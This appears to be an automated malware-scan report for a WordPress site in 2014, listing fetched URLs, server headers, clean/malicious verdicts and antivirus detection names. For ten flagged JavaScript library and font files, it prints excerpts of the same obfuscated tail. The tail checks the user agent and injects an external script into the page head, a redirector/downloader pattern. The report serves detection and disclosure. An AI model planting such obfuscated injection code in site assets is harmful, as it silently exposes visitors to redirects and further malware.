Request | Server response | Status |
http://a-f-design.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Dec 2014 19:45:08 GMT Location: http://www.a-f-design.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.a-f-design.com/wordpress/xmlrpc.php X-Powered-By: PHP/5.2.17
| clean |
http://www.a-f-design.com/ | 200 OK Content-Length: 11605 Content-Type: text/html | clean |
http://www.a-f-design.com/wordpress/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 92744 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("<!doctype><html><body></body></html>");b=cl.createElement(a),cl.bod
... 3178 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
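Note on the excerpt above: its opening portion appears to be the library's ordinary code; the flagged part is the obfuscated tail after the skipped bytes, which recurs unchanged in every file marked malicious in this report. In the visible portion, that tail escapes one document property and one navigator property, concatenates them with entries of the `_0xa687` string table, and assigns the result to a property of an object that it then passes to a method on a variable named `head`. This is consistent with the injection of an external script, but the string table lies in the skipped bytes, so the property names and the destination cannot be read from this excerpt.
Antivirus reports:
- AntiVir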
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- Rising
- Trojan.Script.JS.Redirector.f
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- Fortinet
- JS/Crypt.CABZ!tr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Downloader-2
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.0.1 | 200 OK Content-Length: 18229 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.prettyPhoto={version:'2.5.6'};$.fn.prettyPhoto=function(settings){settings=jQuery.extend({animationSpeed:'normal',opacity:0.80,showTitle:true,allowresize:true,default_width:500,default_height:344,counter_separator_label:'/',theme:'light_rounded',hideflash:false,wmode:'opaque',autoplay:true,modal:false,changepicturecallback:function(){},callback:function(){},markup:'<div class="pp_pic_holder"> \ <div class="pp_top"> \ <div class="pp_left"><
... 3565 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- nProtect
- Trojan.Agent.JS.DN
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/easing.js?ver=3.0.1 | 200 OK Content-Length: 9479 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur
... 3385 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/Crypted.AG!tr.dldr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/cufon-yui.js?ver=3.0.1 | 200 OK Content-Length: 19635 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&
... 3060 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/Crypt.CABZ!tr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
- ESET-NOD32
- JS/Agent.NEQ
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/ColaborateLight_400.font.js?ver=3.0.1 | 200 OK Content-Length: 42465 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":175,"face":{"font-family":"ColaborateLight","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 4 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"4","bbox":"-9 -301 312 75","underline-thickness":"18","underline-position":"-18","stemh":"19","stemv":"23","unicode-range":"U+0020-U+0192"},"glyphs":{" ":{"w":87},"\u00f0":{"d":"159,-102v0,53,-12,107,-74,107v-41,0,-69,-34,-69,-74v0,-75,93,-101,119,-38v0,-44,-12,-74,-40,-92r-31,21r-19,-11r28,-
... 3024 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/Colaborate-Medium_400.font.js?ver=3.0.1 | 200 OK Content-Length: 41931 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":194,"face":{"font-family":"Colaborate-Medium","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 3 7 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-11 -301 336 88","underline-thickness":"18","underline-position":"-18","stemh":"19","stemv":"41","unicode-range":"U+0020-U+0192"},"glyphs":{" ":{"w":97},"\u00f0":{"d":"178,-102v0,53,-14,108,-83,108v-41,0,-78,-28,-78,-72v0,-73,79,-110,119,-53v0,-35,-13,-59,-37,-71r-28,19r-29,-17r2
... 3024 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 11598 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=
... 3128 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- ViRobot
- JS.A.JScript.11448
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- ESET-NOD32
- JS/Agent.NEQ
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/pk.js?ver=3.0.1 | 200 OK Content-Length: 27499 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict(); jQuery(document).ready(function(){ jQuery(".main_menu").pk_menu(); jQuery("#options_wrapper").pk_options_menu(); if(jQuery("#project_details").length == 0) { jQuery(".big_gallery").pk_gallery({ photos: ".item", thumbs: ".gallery_navigation a", buttonNext: ".gallery_button_next", buttonPrev: ".gallery_button_prev", buttonPlayPause: ".button_play_pause", easing: "easeInOutQuad", speedIn: 400,
... 3343 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan ( 0ea2df630 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2164 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form
... 1196 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Dropped:Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Dropped:Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- MicroWorld-eScan
- Dropped:Trojan.Agent.JS.DN
- Fortinet
- JS/Crypted.AG!tr.dldr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Dropped:Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Dropped:Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Dropped:Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.2 | 200 OK Content-Length: 2305 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function(){jQuery('a').each(function(){var a=jQuery(this);var href=a.attr('href');if(href==undefined) return;var url=href.replace('http://','').replace('https://','');var hrefArray=href.split('.').reverse();var extension=hrefArray[0].toLowerCase();var hrefArray=href.split('/').reverse();var domain=hrefArray[2];var downloadTracked=false;if(jQuery.inArray(extension,analyticsFileTypes)!=-1){downloadTracked=true;a.click(function(){if(analyticsEventTracking=='enabled'){_gaq
... 1361 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan ( 0ea2df630 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/Crypted.AG!tr.dldr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://a-f-design.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 19:45:11 GMT Pragma: no-cache Location: http://www.a-f-design.com/test404page.js Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 17 Dec 2014 19:45:12 GMT X-Pingback: http://www.a-f-design.com/wordpress/xmlrpc.php X-Powered-By: PHP/5.2.17
| clean |
http://www.a-f-design.com/test404page.js | 404 Not Found Content-Length: 8616 Content-Type: text/html | clean |
http://www.a-f-design.com/design/ | 200 OK Content-Length: 12495 Content-Type: text/html | clean |
http://www.a-f-design.com/design/raum/ | 200 OK Content-Length: 60069 Content-Type: text/html | clean |
http://www.a-f-design.com/design/kommunikation/ | 200 OK Content-Length: 23025 Content-Type: text/html | clean |